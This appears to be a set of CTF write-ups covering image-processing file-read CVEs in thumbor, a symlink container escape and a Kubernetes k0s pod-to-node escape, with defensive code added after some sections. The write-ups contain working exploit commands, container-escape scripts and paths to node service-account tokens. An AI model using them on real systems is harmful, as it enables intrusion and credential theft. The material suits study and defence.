python:3.7.11-buster vulnerable to CVE-2022-44268 (Exiftool arbitrary file read)
| Event Name | TPCTF |
| GitHub URL | - |
| Challenge Name | thumbor 1 |
# tl;dr
This challenge is vulnerable to https://github.com/entr0pie/CVE-2022-44268, so we can read arbitrary files, for example /flag.
Here is the payload we used to generate `exploit.png` and solve the challenge:
solver.py (only the skeleton survived on the page; the function bodies are not included):

```python
#!/usr/bin/env python3
import sys
import png
import zlib
import argparse
import binascii
import logging

logging.basicConfig(stream=sys.stderr, level=logging.INFO,
                    format='%(asctime)s - %(levelname)s - %(message)s')

d = zlib.decompressobj()
e = zlib.compressobj()

# IHDR chunk data: 10x10 px, bit depth 8, colour type 2 (RGB), no interlace
IHDR = b'\x00\x00\x00\n\x00\x00\x00\n\x08\x02\x00\x00\x00'
# IDAT chunk data: zlib stream of the pixel rows (the literal is truncated on the page)
IDAT = b'x\x9c\xbd\xcc\xa1\x11\xc0 \x0cF\xe1\xb4\x03D\x91\x8b`\xffm\x98\x010\x89\x01\xc5\x00\xfc\xb8n\x8eV\xf6\xd9'

def parse_data(data: bytes) -> str:
    ...  # body not on the page

def read(filename: str):
    ...  # body not on the page

def write(from_filename, to_filename, read_filename):
    ...  # body not on the page

def main():
    ...  # body not on the page

if __name__ == '__main__':
    main()
```
solve.sh:

```sh
# create a benign 100x100 base image
convert -size 100x100 xc:black output.png
# embed the read request for /flag into exploit.png
python3 solver.py -i output.png -o exploit.png -r /flag generate
# make thumbor fetch and process our image; the result carries the file contents
curl "http://1.95.57.127:3502/thumbor/unsafe/300x/filters:format(png)/http://6.tcp.ngrok.io:15364/exploit.png" -o flag
# pull the hex-encoded contents back out of the returned PNG
python3 solver.py -i flag -o foo parse
# decode the hex to get the flag
echo "54504354467b6576316c5f504e475f6d616731636b5f4c66697d0a" | xxd -r -p
```
pandoc/core:2.18-ubuntu vulnerable to CVE-2023-38633 (librsvg)
| Event Name | TPCTF |
| GitHub URL | - |
| Challenge Name | thumbor 2 |
# tl;dr
This challenge is vulnerable to https://www.canva.dev/blog/engineering/when-url-parsers-disagree-cve-2023-38633/, which lets us read arbitrary files using this payload (the body of the SVG is missing from the page; only the wrapper with the XInclude namespace survived):

```xml
<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<svg width="300" height="300" xmlns:xi="http://www.w3.org/2001/XInclude">
</svg>
```

Then we curl the app, making the vulnerable service fetch our SVG and process it:

```sh
curl "http://1.95.57.127:3601/thumbor/unsafe/http://4.tcp.ngrok.io:16592/exploit.svg" -o flag.png
```

After that we receive an image containing our flag:

TPCTF{un5af3_5vg_X1nclude}
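An added defensive check, not part of the write-up or of thumbor: an SVG pre-processing gate that rejects any document declaring or using the XInclude namespace, which is the feature CVE-2023-38633 abuses in librsvg. Refusing XInclude outright avoids having to validate included paths at all (the bug was precisely two URL parsers disagreeing about a path). The sample documents below are constructed; the href value is a placeholder.

```python
import xml.etree.ElementTree as ET

XINCLUDE_NS = "http://www.w3.org/2001/XInclude"

def xinclude_findings(svg_text: str) -> list:
    """Return a list of findings; an empty list means no XInclude usage.

    Both a declared xmlns:xi namespace and every element resolved into that
    namespace are reported, so a file that merely declares the namespace is
    still flagged. ElementTree does not expand XInclude or fetch external
    resources here, so walking the tree is safe for untrusted input.
    """
    findings = []
    if XINCLUDE_NS in svg_text:
        findings.append(("xinclude-namespace-declared", XINCLUDE_NS))
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError as exc:
        return [("unparseable", str(exc))]  # malformed input is treated as unsafe
    for el in root.iter():
        if el.tag.startswith("{" + XINCLUDE_NS + "}"):
            local_name = el.tag.split("}", 1)[1]          # e.g. "include"
            findings.append((local_name, el.get("href", "")))
    return findings

def is_safe_svg(svg_text: str) -> bool:
    """Gate for the image pipeline: only SVGs without any XInclude usage pass."""
    return not xinclude_findings(svg_text)

# Constructed samples (not from the challenge): a plain SVG and one using XInclude.
BENIGN_SVG = ('<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">'
              '<rect width="10" height="10"/></svg>')
XINCLUDE_SVG = ('<?xml version="1.0"?>'
                '<svg xmlns="http://www.w3.org/2000/svg" '
                'xmlns:xi="http://www.w3.org/2001/XInclude" width="300" height="300">'
                '<text x="10" y="20"><xi:include href="CONSTRUCTED-placeholder.txt" '
                'parse="text"/></text></svg>')

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN_SVG), ("xinclude", XINCLUDE_SVG)):
        print(name, "pass" if is_safe_svg(doc) else "REJECT", xinclude_findings(doc))
```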
There's a special case where we can create a symlink that points to a file on the host container.
l3hctf 2024
https://s1um4i-official.feishu.cn/docx/QeGGdeyuhoR6kuxCOj8c44wRnne#SfxUd5lMRoxkfCx1G7HcrCTbnob
The detailed write-up can be seen at https://hust-l3hsec.feishu.cn/docx/MZ8SdwSoPo3cBTxOxbGcuUBun4c

```sh
ln -sf /flag /app/output.txt
```
From my analysis, it's because /dev/sda2 is mounted at /app
/dev/sda2 /app ext4 rw,relatime,errors=remount-ro,stripe=256 0 0
@daffainfo
so if we symlink something in /app, it will point to the file on /dev/sda2
turns out it's because of this
```haskell
["docker run -d --restart=always"
,"--device /dev/ppp"
,"--cap-add=net_admin"
,"--name",n,"-h",n
,"-v "++flags_dataDir++":/data", portDef, flags_image
,"/init.sh ", escapeMany [server,user,pass]
]
```
https://paper.seebug.org/396/
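An added defensive example, not from the write-up or the challenge: how a host-side process should read a file from a directory it shares with a container (the bind-mounted `/app` above) without being redirected by an `ln -sf` inside it. It combines a resolved-path containment check with `O_NOFOLLOW` on the final open; the directory layout is constructed in a temp dir, with `shared/` standing in for /app and `secret.txt` for /flag.

```python
import os
import tempfile

def safe_read(base_dir: str, name: str) -> bytes:
    """Read base_dir/name without following symlinks anywhere in the path.

    Two independent checks: the fully resolved path must stay under the resolved
    base (catches symlinked directories), and the final open uses O_NOFOLLOW so a
    symlink swapped in after the check is still refused (the realpath check alone
    is racy)."""
    base = os.path.realpath(base_dir)
    target = os.path.join(base, name)
    if os.path.commonpath([base, os.path.realpath(target)]) != base:
        raise PermissionError("%s resolves outside %s" % (target, base))
    fd = os.open(target, os.O_RDONLY | os.O_NOFOLLOW)  # ELOOP if target itself is a symlink
    with os.fdopen(fd, "rb") as f:
        return f.read()

def demo() -> dict:
    """Constructed layout: shared/ plays the bind-mounted /app, secret.txt plays /flag."""
    root = tempfile.mkdtemp()
    shared = os.path.join(root, "shared")
    os.mkdir(shared)
    secret = os.path.join(root, "secret.txt")
    with open(secret, "w") as f:
        f.write("not-for-the-container\n")
    with open(os.path.join(shared, "output.txt"), "w") as f:
        f.write("legit output\n")
    os.symlink(secret, os.path.join(shared, "linked.txt"))          # points outside the share
    os.symlink("output.txt", os.path.join(shared, "inner-link.txt"))  # points inside the share
    results = {}
    for name in ("output.txt", "linked.txt", "inner-link.txt"):
        try:
            results[name] = safe_read(shared, name)
        except PermissionError as e:   # containment check fired
            results[name] = type(e).__name__
        except OSError as e:           # O_NOFOLLOW fired (ELOOP)
            results[name] = type(e).__name__
    return results

if __name__ == "__main__":
    print(demo())
```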
BPF cronescape
l3hctf 2024 escape-2
https://s1um4i-official.feishu.cn/docx/QeGGdeyuhoR6kuxCOj8c44wRnne
https://github.com/TomAPU/bpfcronescape/
The detailed write-up can be seen at https://hust-l3hsec.feishu.cn/docx/MZ8SdwSoPo3cBTxOxbGcuUBun4c
Kubernetes/k0s pod → node rootfs escape: runAsNonRoot UID-overflow (CVE-2024-40635) + cgroupfs path-traversal
| Event Name | SAS CTF 2026 |
| GitHub URL | - |
| Challenge Name | paradoxy (web, k0s, id=10) |
Attachments: Dockerfile.escape, escape.sh

The pod is locked down (runAsNonRoot, cap drop ALL, readOnlyRootFilesystem), but the host node's cgroupfs is bind-mounted at /sys/fs/cgroup; from a cwd inside it, relative `..` traversal crosses the bind mount into the host (k0s-worker) rootfs, giving arbitrary node file read once you are uid 0.

USER 4294967296 (= 2³²; the kernel truncates it to uid 0, so it passes the kubelet "uid ≠ 0" admission check but runs as root) + WORKDIR /sys/fs/cgroup; the entrypoint reads ../../../usr/local/sbin/paradoxy-bootstrap and greps for SAS{. The flag is baked into the on-node bootstrap binary. Zero network calls.

The konnectivity route (/root/konnectivity-agent-token + konnectivity-server :8132) is the intended path (see "Intended solution" below) but I could not crack it: agent interception wins 0 dials (apiserver→kubelet is direct on the flat node subnet), the frontend ProxyService is Unimplemented, and the gopher SA has only get/list nodes (node objects contain no flag).

cat ../../../etc/hostname → k0s-worker. (Technique and flag location are team-confirmed via node-rootfs read logs; the literal SAS{...} was not re-extracted here because the platform deploy was erroring.)

# Why it is vulnerable
```dockerfile
# 1) runAsNonRoot bypass (CVE-2024-40635 class): a UID > uint32 wraps to 0.
# kubelet sees uid != 0 and admits the pod; the kernel truncates 2^32 -> uid 0 => ROOT
# (numeric 0 and named users are both rejected; only the overflow passes)
USER 4294967296
# 2) the host cgroupfs is bind-mounted at /sys/fs/cgroup; ".." from it escapes into the NODE rootfs:
# readlink ../../../proc/self/cwd -> /sys/fs/cgroup
# cat ../../../etc/hostname -> "k0s-worker" (the NODE hostname, not the pod's)
WORKDIR /sys/fs/cgroup
```

# Exploit payload
```sh
cd /sys/fs/cgroup
cat ../../../etc/hostname   # k0s-worker (escape confirmed)
# the flag (try depths ../../.., ../../../.., ../../../../..)
grep -aoE 'SAS\{[^}]*\}' ../../../usr/local/sbin/paradoxy-bootstrap
```

# Solver
Dockerfile.escape:

```dockerfile
FROM alpine:3.20
COPY escape.sh /escape.sh
RUN chmod +rx /escape.sh
# cwd = host cgroupfs bind mount
WORKDIR /sys/fs/cgroup
# 2^32 -> uid 0 (runAsNonRoot bypass)
USER 4294967296
ENTRYPOINT ["/bin/sh","/escape.sh"]
```

escape.sh:
```sh
cd /sys/fs/cgroup
cat ../../../etc/hostname   # -> k0s-worker
for u in ../../.. ../../../.. ../../../../..; do
    grep -aoE 'SAS\{[^}]*\}' "$u/usr/local/sbin/paradoxy-bootstrap" 2>/dev/null | sort -u
done
```

Build, push to an anonymous registry, run it as a pod via the app, then read the flag from the pod logs:

```sh
IMG=ttl.sh/pdxe-$(uuidgen | cut -c1-8):1h
docker build --platform linux/amd64 -f Dockerfile.escape -t "$IMG" . && docker push "$IMG"
curl -sk "$INSTANCE/api/send" -H 'Content-Type: application/json' -d "{\"image\":\"$IMG\"}"
curl -sk "$INSTANCE/api/pods/$POD/logs"   # -> SAS{...}
```

Other node files readable the same way: ../../../var/lib/k0s/kubelet/pods/*/volumes/kubernetes.io~projected/.../token (konnectivity-agent, kube-router, kube-proxy, coredns), ../../../root/konnectivity-agent-token/token, ../../../var/lib/k0s/kubelet.conf.

# Intended solution (per author) vs. the escape above
The intended path is not the node-rootfs read. It is: run the pod as root → leak the konnectivity-agent token → attack the control plane via konnectivity:

USER 4294967296 (2³² → uid 0) bypasses runAsNonRoot → in-pod root → read the hostPath-mounted /root/konnectivity-agent-token/token (SA kube-system:konnectivity-agent). Use it against konnectivity-server (172.31.0.10:8132) to pivot into the control plane and reach the flag.

The cgroupfs node-rootfs read documented above is the practical, unintended shortcut (grep SAS{ ../../../usr/local/sbin/paradoxy-bootstrap) and is the path that was actually used to grab the flag.

⚠️ Not fully reproduced: extensive testing of the konnectivity path dead-ended. A rogue agent intercepted 0 apiserver→backend dials, the frontend ProxyService is Unimplemented on 8132, the gopher SA has only get/list nodes and the konnectivity-agent SA has no resource RBAC, and the apiserver (172.31.0.10:6443) is reachable but exposes no readable flag. The exact konnectivity→control-plane step that yields the flag is unconfirmed; reproduce on a local k0s cluster (controller+worker, konnectivity native) to pin it down.
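An added defensive check, not from the write-up or the challenge: admission-style validation of a pod spec that rejects the two conditions the escape relies on, a runAsUser outside the 32-bit uid_t range (4294967296 wraps to 0 and slips past a plain "uid != 0" test) and hostPath volumes that expose node paths. It assumes the cgroupfs exposure comes in as a hostPath volume, which the write-up does not state, and the deny list and sample specs are constructed for illustration.

```python
import posixpath

UID_MAX = 2**32 - 1  # Linux uid_t is 32 bits; 4294967296 & UID_MAX == 0

# Node paths an untrusted pod must never get as a hostPath. Assumption: a minimal
# deny list for illustration, not a complete policy.
DENIED_HOST_PATHS = ("/sys/fs/cgroup", "/proc", "/root", "/var/lib/k0s")

def effective_uid(requested: int) -> int:
    """The uid the kernel actually ends up with after 32-bit truncation."""
    return requested & UID_MAX

def check_run_as_user(requested):
    """Return None if the UID is acceptable, otherwise a reason string.
    Range-checking against uid_t rejects 4294967296; a bare 'uid != 0' test does not."""
    if isinstance(requested, bool) or not isinstance(requested, int):
        return "runAsUser must be an explicit integer (do not rely on the image USER)"
    if not 1 <= requested <= UID_MAX:
        return "runAsUser %d is outside 1..%d" % (requested, UID_MAX)
    return None

def check_pod_spec(spec: dict) -> list:
    """Return the list of policy violations for a simplified pod spec dict."""
    problems = []
    reason = check_run_as_user(spec.get("securityContext", {}).get("runAsUser"))
    if reason:
        problems.append(reason)
    for vol in spec.get("volumes", []):
        path = vol.get("hostPath", {}).get("path")
        if path is None:
            continue
        norm = posixpath.normpath(path)  # collapse ".." segments before matching
        if any(norm == d or norm.startswith(d + "/") for d in DENIED_HOST_PATHS):
            problems.append("hostPath %s exposes node path %s" % (path, norm))
    return problems

# Constructed samples: the shape of the escape pod versus a hardened one.
ESCAPE_POD = {
    "securityContext": {"runAsNonRoot": True, "runAsUser": 4294967296},
    "volumes": [{"name": "cg", "hostPath": {"path": "/sys/fs/cgroup"}}],
}
HARDENED_POD = {
    "securityContext": {"runAsNonRoot": True, "runAsUser": 10001},
    "volumes": [{"name": "tmp", "emptyDir": {}}],
}

if __name__ == "__main__":
    for name, pod in (("escape", ESCAPE_POD), ("hardened", HARDENED_POD)):
        print(name, check_pod_spec(pod) or "ok")
```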